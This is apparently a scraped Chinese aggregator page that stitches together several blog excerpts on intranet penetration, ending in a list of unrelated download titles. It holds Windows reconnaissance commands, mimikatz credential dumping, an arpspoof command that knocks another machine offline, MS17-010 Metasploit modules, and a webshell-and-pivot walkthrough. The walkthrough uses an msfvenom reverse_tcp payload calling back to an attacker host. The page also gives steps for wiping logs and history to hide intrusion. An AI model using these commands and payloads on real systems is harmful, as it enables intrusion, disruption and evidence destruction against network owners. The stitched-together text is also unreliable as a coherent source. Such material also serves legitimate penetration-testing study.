-
内网渗透
2020-10-04 06:26:56目录什么是外网渗透什么是内网渗透域工作组 什么是外网渗透 外网更侧重于找漏洞寻找突破口 举个简单的例子: 把渗透测试当做去偷某家超市的某个商品。外网渗透就是突破超市的大门,进入超市。 想要进入超市,这个...在说内网渗透前,先说说什么是外网渗透
什么是外网渗透
外网更侧重于找漏洞寻找突破口
举个简单的例子:
把渗透测试当做去偷某家超市的某个商品。外网渗透就是突破超市的大门,进入超市。想要进入超市,这个时候我们要寻找一下超市防守不到位的地方:比如是不是窗户没关、监控是不是半夜十二点为了备份前一天的视频内容而短暂失灵、保安是不是凌晨三点就会开始划水、大门是不是可以用万能钥匙打开……
外网渗透就是收集这些“漏洞”,综合多方因素,利用天时地利人和,突破限制,闯入超市内部。所以,外网渗透阶段,考验的是白帽的综合能力,外网渗透的目的还是为了进入内网。
什么是内网渗透
内网更侧重于对目标的熟悉程度。
如果你突破“外网”的限制,成功进入“内网”,那么这一阶段对你的要求又有所不同。
对环境是否足够熟悉?对目标的情况是否了然于胸?是否知道哪里有摄像头?哪里有敏感信息,哪里有红外线探测,你要的商品在哪个柜台……在重重关卡下成功拿到信息后,还要全身而退,将你留下的指纹、脚印全擦掉,不留半点痕迹。
当然,术业有专攻,作为渗透人员,或许对目标的内部不够熟悉。所以这时候你需要一个帮手——安全运维。安全运维,顾名思义,是运维,相当于超市内部的保安。他能以同行的身份,推测超市的安保情况,而且对超市内部的信息更了解。
分类
内网渗透分为域渗透和工作组渗透两类。
域渗透- 1.域信息收集
- 2.获取域权限
- 3.dump域hash
- 4.内网权限维持
工作组渗透
- 1.常规内网渗透
- 2.各种欺骗攻击
工作组
工作组里的电脑都是平等的,是最常见最普通的资源管理模式,将不同的电脑按功能分别列入不同的组,以方便管理;相对而言,所处在同一个工作组内部成员相互交换信息的频率最高。
你可以随便加入同一网络上的任何工作组——如果你加入一个不存在的工作组,也就相当于新建一个工作组了。可以随便离开一个工作组,来去自由。“工作组”就像一个自由加入和退出的群聊一样,它本身的作用仅仅是提供一个“房间”,你只要进群,就能看到群友共享的资源。而且群里没有群主和管理员,群员之间都是平等的。域
父域,子域:子域是相对父域来说的,一个父域有很多子域
林域:以父域为中心,有很多子域。
单域:只有一个林域域名——dns(严格来说是一种目录服务)——域服务
域是不平等的,高级域可以操控低级域,父域可以影响子域。比如重置密码等操作。安全组虽然名字里有安全两个字,但是实际上不太安全。
所以域就出来了,比起安全组,他多了群主(域控)、多了管理员(管理员服务器)。
域控制器中包含了由这个域的账户、密码、属于这个域的计算机等信息构成的数据库。当电脑联入网络时,域控制器首先要鉴别这台电脑是否是属于这个域的,用户使用的登录账号是否存在、密码是否正确。如果以上信息有一样不正确,那么域控制器就会拒绝这个用户从这台电脑登录。在“域”模式下,至少有一台服务器负责每一台联入网络的电脑和用户的验证工作。称为“域控制器(Domain Controller,简写为DC)”。也就是所谓的群主。一个群可以没有管理员,但是必须有群主。
你想加入一个域,首先得要域控或者管理员服务器在域里面添加一个账号密码,然后你用管理员服务器新建的这个账号密码才能登录。也就是说你想进域,首先得管理员同意才行。
每次你登陆域,管理员都会检查账号密码对不对。不对则不许登陆。
工作组则不一样了,账号不在工作组里面?那就把这个账号添加进工作组。
域一般是大公司使用,等级深明。工作组一般是小公司用,平等自由。
内网渗透思路
1.内网环境下先查看网络架构。例如 网段信息 域控 DNS服务器 时间服务器
2.收集到了足够多的信息可以扫一下开放端口 21 22 80 8080 443等确定敏感信息,以及之后渗透的方向
3.通过以上信息进行一定的弱口令尝试,针对特定的软件做banner采集利用,snmp测试读取和写入权限
4.进行一些提权操作,从横向和纵向对目标服务器进行渗透。
5.进行敏感信息挖掘,内网密码收集嗅探,同时擦除入侵足迹。擦除痕迹步骤
1.清相关日志
2.清日志分析服务
3.清命令行记录(历史命令)
4.清内存
5.清缓存 (可以用脚本清,然后销毁脚本)内网信息收集
命令 作用 ipconfig /all 查询本机IP段,所在域等 net user 本机用户列表 net localgroup administrators 本机管理员[通常含有域用户] net user /domain 查询域用户 net group /domain 查询域里面的工作组 net group “domain admins” /domain 查询域管理员用户组 net localgroup administrators /domain 登录本机的域管理员 net localgroup administrators workgroup\user001 /add 域用户添加到本机 net group “domain controllers” /domain 查看域控制器(如果有多台) net time /domain 判断主域,主域服务器都做时间服务器 net config workstation 当前登录域 net session 查看当前会话 net use \ip\ipc$ pawword /user:username 建立IPC会话[空连接-***] net share 查看SMB指向的路径[即共享] net view 查询同一域内机器列表 net view \ip 查询某IP共享 net view /domain 查询域列表 net view /domain:domainname 查看workgroup域中计算机列表 net start 查看当前运行的服务 net accounts 查看本地密码策略 net accounts /domain 查看域密码策略 nbtstat –A ip netbios 查询 netstat –an/ano/anb 网络连接查询 route print 路由表 tasklist /V 查看进程[显示对应用户] tasklist /S ip /U domain\username /P /V 查看远程计算机进程列表 qprocess * 类似tasklist qprocess /SERVER:IP 远程查看计算机进程列表 nslookup –qt-MX Yahoo.com 查看邮件服务器 whoami /all 查询当前用户权限等 set 查看系统环境变量 systeminfo 查看系统信息 qwinsta 查看登录情况 qwinsta /SERVER:IP 查看远程登录情况 fsutil fsinfo drives 查看所有盘符 内网信息收集
(1) 位置的判断
位置判断是指机器处于网络拓扑中的某个区域,是在DMZ区,办公网,还是核心区,核心DB等多个位置,当然这里的区域并不是绝对的,只是大概的一个环境,不同的地方网络环境不一样,区域的界限也不一定明显。
(2) 角色的判断
机器角色的判断指判断已经控制的机器是普通Web服务器、开发测试服务器、公共服务器、文件服务器还是代理服务器、DNS服务器、存储服务器等等。具体的判断是通过对机器内的主机名、文件、网络连接等多种情况进行综合判断的。
(3)连通性的判断
出口流量是否连通的判断指机器是否能上外网这些,要综合判断协议(tcp\http\dns\icmp等协议)与端口(常见能出去的端口有80,8080,443,53,110,123等)。在这里还有一种是网络内网设置了代理服务器的情况,攻击者通常会查看环境变量set,主机名是否有proxy字样的机器,注册表是否有写明代理地址或指定pac代理文件等。
内网主机存活探测
Ping
Arp
Tracert
routeHash抓取
使用mimikatz提取系统hash与明文
破解出的NTLM可以尝试CMD5破解横向移动
1.默认权限配置认知
当某些普通\不普通用户加入AD的rdp组或其他管理组,当攻击者拿到这些用户的权限时就相当于可以获取到域控制器的权限了。2.端口转发与协议代理
工作组采取的一般都是常规渗透方法,因为工作组一般都是个人和少数服务器3.工作组横向渗透
4.域环境横向渗透
5.权限维持
-
EW内网渗透
2018-05-06 18:24:39EW内网渗透 EW内网渗透 EW内网渗透 EW内网渗透 EW内网渗透 EW内网渗透 -
Linux kali内网渗透之ARP断网攻击
2020-03-19 06:59:34Linux kali内网渗透之ARP断网攻击 ARP断网攻击 如果你的kali是虚拟机 ,请将其设置为网络桥接模式,这样才和内网在同一网段 如果你的kali里没有安装arpspoof,请在终端输入如下命令进行安装 apt-get install dsniff ...Linux kali内网渗透之ARP断网攻击
ARP断网攻击
如果你的kali是虚拟机 ,请将其设置为网络桥接模式,这样才和内网在同一网段
如果你的kali里没有安装arpspoof,请在终端输入如下命令进行安装
apt-get install dsniff
终端输入命令得知本机网卡编号以及内网网段
查询该网段下所有活跃IP
查询另一台相同WIFI网络下的电脑的IP地址为192.168.20.100(此地址也出现在上述查询出的活跃IP中,所以在此攻击这台电脑看看效果)输入以下命令进行ARP断网攻击:
arpspoof -i eth0 -t 192.168.20.100 192.168.21.254
(eth0即是我们之前在kali查询出的网卡编号,192.168.20.100是受害者ip地址,192.168.21.254是受害者网关地址)
可以看的出来效果很显著
-
内网渗透-内网渗透用到的主要漏洞
2020-06-28 23:01:45内网渗透-内网渗透用到的主要漏洞讲在前面:列举的只是部分内网渗透用到的漏洞,当然在不局限于此,根据实际情况进行发挥,同时复现不代表真实渗透环境,在文章最后,我会解释内网渗透主要利用的两个漏洞做的事情。认真看好吗弟弟!!!
MS17-010 主机漏洞,永恒之蓝
漏洞复现,关于windows主机漏洞在MSF下常用的几个成熟模块如下所示:
auxiliary/scanner/smb/smb_version
auxiliary/scanner/smb/smb_ms17_010
auxiliary/admin/smb/ms17_010_command
exploit/windows/smb/ms17_010_eternalblue
exploit/windows/smb/ms17_010_psexec按照正常的情况来,我们优先对目标机器进行版本信息扫描以及漏洞探测,使用如下模块
扫描模块:use auxiliary/scanner/smb/smb_version 扫描目标机器的445版本信息
use auxiliary/scanner/smb/smb_ms17_010 扫描目标机器是否存在445MSF命令:
设置某一模块参数 set 参数名 参数内容
选择某一个模块 use 模块路径
查看当前模块设置 show options
将当前meterpreter会话放在后台 background sessions
进入当前后台某一会话
攻击模块:
auxiliary/admin/smb/ms17_010_command
exploit/windows/smb/ms17_010_eternalblue
exploit/windows/smb/ms17_010_psexec这里我们讲smbuser和smbpass设置了,不然会出现找不到命名管道
按照实验的情况,MS17-010对实验的Win7存在版本的要求,如果对应版本的Win7系统使用MSF的psexec模块攻击找不到命名管道,属于正常现象,解决办法是可以寻找一个帐号密码和添加管道命名(管道命名的成功概率很低,还是选找一个新的帐号密码为好)
MS-14-068 服务漏洞,域用户权限提升
漏洞复现:
目前公开的利用方式有博客可循的,三种方式,利用msf进行ms14-068提权。利用ms14-068.exe工具集成minikatz功能直接写入。使用MS14-068.exe加minikataz进行权限提升
使用该漏洞,实际环境要么是流量代理出来进行交互操作,要么是直接上传ms14-068.exe不进行交互操作直接拿返回结果进行操作,当然实际运用可以自行发挥。
使用MS14-068.exe操作
win7旗舰版
windows-server-2008
查看当前域用户能否直接查看域控主机盘符
minikataz查看本机内存票据,并进行清除
查看本机域用户sid
使用MS14-068工具生成该域用的高权限票据
使用minikataz将票据写入内存中
再次查看能否查看域控主机盘符
使用ms14-068.exe操作
获取指定域账户的详细信息,为伪造票据并写入做准备
根据获取的信息。对域账户进行权限提升,也就是做写入域管理权限的票据到内存的操作
写入失败。这里未细究是系统版本位数不对还是如何。
使用MSF进行权限提升漏洞
这是国外博客给出的利用过程,明天更新kali如何操作,并完成内网渗透-隧道代理的博客
-
内网渗透 | 手把手教你如何进行内网渗透
2020-11-23 21:33:36内网渗透 | 手把手教你如何进行内网渗透 目录 内网渗透 | 手把手教你如何进行内网渗透 0x01 DMZ渗透 0x02 跳板及内网探测 0x2.1 做跳板 0x2.2 内网探测 0x03 第二层渗透 0x3.1 web渗透 or MS17_010 0x3.2 ...内网渗透 | 手把手教你如何进行内网渗透
目录
0x01 DMZ渗透
首页
看到DMZ开启了web服务,是一个typecho的cms,后台默认就是/admin
后台
尝试爆破
弱口令admin1234
但是找了一圈并没有发现有什么可以利用的,网上有一个反序列化的洞可以用。
exp
上面呢,就是利用exp将一句话写入当前目录的shellx.php中。
get shell
到这里呢,想了想我们的目标是内网,并且防火墙没开,就不考虑提权了。
0x02 跳板及内网探测
现在的目标是将此DMZ服务器当作跳板并探测内网的服务器。
0x2.1 做跳板
采用ew套接字<socks>代理,服务器上运行准备好的ew_for_linux64,本地使用proxifier配置如下:
代理规则配置如上,可以根据情况具体配置,以上是Windows端的配置,但是渗透难免会用到kali,所以kali也需要配置:
首先修改一下/etc/proxychains.conf,如下图所示:
修改完成后保存,然后就可以proxychains nmap等等。
至此,跳板配置基本完成。
还有一种方法是利用msf生成马儿让目标运行,反弹回来meterpreter查看路由添加路由,然后msf就可以访问内网,可以使用msf来探测以及渗透测试。
0x2.2 内网探测
这里首先有几种方法。
第一种,ifconfig,适用于双网卡的情况:
但是可以看到,并没有我们需要的信息。
第二种查看路由以及arp:
路由
上图是查看路由,还可以利用arp -a查看一下arp的信息,以及可以利用traceroute xxx.com查看一下路由走的路径。
但是看到也没有我们想要的信息,到这里我是很迷茫了,找不到内网另一个ip段,我就去问了一下环境的搭建者,他也不知道怎么找,索性就把ip段告诉了我,此处留个疑问,希望有想法的大佬联系我。
既然知道了ip段,就需要探测一下到底哪些主机我们可以渗透:
nmap
利用proxychain nmap达到nmap使用代理扫描的效果,这里需要注意的是socket代理不支持ICMP协议,所以nmap的参数应设置如上图所示,端口可以自己改。
可以看到10.10.1.1以及10.10.1.2的80端口都开着,那我就proxychains3 firefox打开火狐访问了一下,第一个是路由器的管理,第二个是一个cms。到这里呢,可以去猜一下路由的密码,我是直接去看了cms,因为kali中渗透web有点麻烦,所以就利用上面配置好的proxifier代理在Windows下进行渗透。
0x03 第二层渗透
0x3.1 web渗透 or MS17_010
UKcms
后台
后台默认路径/admin.php,使用了默认账号密码admin 123456
这个cms呢,后台可以getshell,我是被卡在burpsuite抓包上面,开了burpsuite总是无法访问,后来才发现,在burpsuite里面设置了socks代理就没必要再开proxifier了。burp配置如下:
第一种方法
第二种方法
如上配置后,就不需要再开socks代理工具了,否则会出现问题。
在后台添加php允许上传,再去上传点,不要传php因为判断了Content-Type。
传图片抓包改成php
会看到上传成功的提醒,关于路径有以下方法:
成功getshell,这是一种方法,比较麻烦。
前期内网探测时发现了这是台windows服务器,并且存在MS17_010漏洞,可以proxychains3 msfconsole利用msf直接打。
0x3.2 内网探测+跳板代理链
因为这是第二层内网,所以要连接webshell需要打开proxifier然后用AntSword进行连接。
双网卡
如上图我们知道了第三层ip段为4.4.1.x,看一下arp表:
这种基本猜测下个目标就是4.4.1.2了,但还是需要nmap探测一下,在此之前,先配置代理链。
还是使用earthworm进行socks代理,服务端运行后,本机配置如下:
windows
kali
配置完成后,用nmap探测一下
可以看到开了135、445、3389,啥都不说了,永恒之蓝打一波。
0x4 第三层内网渗透
这里需要注意,payload要选择正向连接的,不要反弹shell,因为我们访问得到目标而目标访问不到我们。
得到一个meterpreter shell。
read password
这样我们拿到了admin的密码,直接远程连接:
3389
至此呢,本次内网渗透就完成了。
0x5 总结
0x5.1 跳板总结
拿到DMZ的shell或权限后,可以使用ew建立socks代理,我们的windows用proxifier,我们的linux用proxychains连接,即可访问内网。如果是多层,那么proxifier提供代理链,proxychains也可以多层代理。
ew_for_linux64 -s ssocksd -l 8888
ew_for_windows.exe -s ssocksd -l 8888
ew建立ss连接。
windows下若需要burpsuite进行配合,就关掉proxifier,使用burpsuite配置socks代理,其他步骤和平常使用burp一样即可。
Linux下若使用burpsuite与上面同理,不要使用proxychains即可。
0x5.2 内网探测
Linux下还可以通过msf进行内网探测以及攻击:
步骤
payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=1234 -f exe -o payload.exe 反弹payload配置,正向配置rhost以及rport即可。
针对双网卡的目标:
ipconfig或ifconfig
arp
若是路由的话,可以先看一下路由,或按照上面msf的情况:
route
若是没有有效信息,可以考虑社工。
关于nmap:
因为ss不支持ICMP协议,所以要加如上参数,若需要其他功能则直接加就行。
0x5.3 后话
本次DMZ开启了web服务是linux服务器,第二层开了web服务是windows服务器,第三层windows服务器。
渗透过程中,首先要明确目标开了什么服务,什么操作系统等等,我们才知道如何下手。
本次渗透没有涉及域渗透,只是简单说明一下渗透流程。
原创投稿作者:Railgun
作者博客:www.pwn4fun.com
本文作者:HACK_Learn
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/123000.html
-
内网渗透之——浅析内网渗透
2020-05-07 22:19:51浅析内网渗透 关于内网渗透其实方法和思路以及要注意的点内容非常多,又是一个大坑,我就暂且先从三个情况下分别整理一种方法,大概了解一下,先挖个坑哈,手里还有资料但太乱了,之后我再整理吧(真的很多,不是我... -
内网渗透指南
2018-11-13 10:03:01内网渗透指南。获取目标的主机存活信息和端口开放信息后,就可以尝试分析目标的网络结构,安全防御策略。按照办公网和生产网分别说一下。 -
内网渗透使用代理访问内网
2015-08-17 21:42:58内网渗透 -
内网渗透思路
2018-06-25 22:18:38一、内网渗透感受1.现在被神话了,本质还是渗透的延伸,只是中间涉及了很多综合的技术2.内网渗透必须要有耐心,要细心3.内网渗透非常耗费时间和精力4.成功的内网渗透会带来很大的成就感二、内网渗透的性质1.偶然性:... -
内网渗透测试
2018-11-27 21:04:39什么是内网? 内网是一个只有组织工作...什么是内网渗透? 已突破外网进入内网 仅面向内网系统渗透测试 模拟内部员工进行渗透测试 内网渗透基本流程: 信息收集 获取权限 横向移动 权限维持 ... -
wce内网渗透
2014-03-23 13:49:44用于内网渗透 抓去密码 抓到管理密码 打开内网 突破 -
内网渗透常用手法.doc
2019-07-18 13:53:13内网渗透常用手法 -
内网渗透讲解与实验手册
2018-05-16 17:30:38内网渗透实验手册,其中包含内网渗透教程与练习环境搭建方法 -
内网渗透学习手册
2020-08-09 22:33:28内网渗透 内网域环境渗透 内网非域环境渗透 内网渗透之MS17-010 获取权限后的操作 利用委派打造隐蔽后门(权限维持) NTLM Relay(中继)攻击 域控权限持久化之Hook PasswordChangeNotify 域控权限持久化之... -
ssrf漏洞内网渗透_CVE20188174漏洞复现及内网渗透攻击
2020-12-01 09:52:37本文涉及的知识点:CVE-2018-8174漏洞复现、内网渗透、权限维持、脚本编程、痕迹清除、端口转发、利用MS17-010提权CVE-2018-8174漏洞简介CVE-2018-8174是 Windows VBScript Engine 代码执行漏洞。由于VBScript脚本... -
初探内网渗透
2020-08-18 19:20:56搭建一个内网环境,做一次简单的内网渗透拓扑概览环境搭建三级目录 拓扑概览 环境搭建 win2008: phpstudy来做web服务 安装DNS 安装DHCP 三级目录 -
内网渗透环境搭建
2020-06-11 16:05:28内网渗透 内网渗透测试,其实很大程度上是域渗透测试。 常见的内网环境一般是(Windows server2003-2019、Windows7) 内网搭建所需环境 Windows server 2012 R2 标准版 Windows server 2008 R2 标准版 Windows 7 ... -
内网渗透技术解析+命令
2018-03-27 21:31:22内网渗透命令大全 -
内网渗透综合实验 - 实验指导书
2020-10-23 11:10:53内网渗透综合实验 - 实验指导书,通过实验学习内网渗透的细节,掌握内网攻防的具体步骤,可以进行实战操作 -
渗透测试--内网渗透
2020-12-12 08:29:47内网渗透 介绍 方法 第一种方法:在具备Webshell的情况下,通过Webshell直接上传CS木马到对方服务器运行,在CS软件上面开启SocksProxy代理,把kail直接通过cs socksProxy代理攻击内网进行横向渗透。 第二种方法:...
-
IPC-4553A-CN:印制板浸银规范-完整中文版(38页)
-
汽车CAN总线系统原理、设计与应用.rar
-
智能车之最小二乘法资料
-
合作博弈网页小游戏-Js源码
-
转行做IT-第7章 数组
-
必须开喷:GitHub上的《程序猿考公指南》文章
-
64位+spacedesk_driver_Win_10_64_v0914_BETA
-
VB6.0中编辑MSHFlexGrid复选行和列.txt
-
OledYZ0124.rar
-
Java 八大基本数据类型的默认值 及其 相关初始化问题分析
-
ORA-38706&ORA-38707报错解决办法
-
【数据分析-随到随学】Spark理论及实战
-
JavaScript的函数,事件(常用事件,事件对象),内置对象(字符串,数组,Date,Nath)超超超级详解!!!
-
易语言识别二维码.rar
-
2020-12-01-DVWA.md
-
02 Java面向对象—第4节 面向对象高级~数组增删查案例(动态扩容)
-
云计算基础-Linux系统管理员
-
centos7.2安装php7.2
-
python寻找摄像头参数
-
Selenium3分布式与虚拟化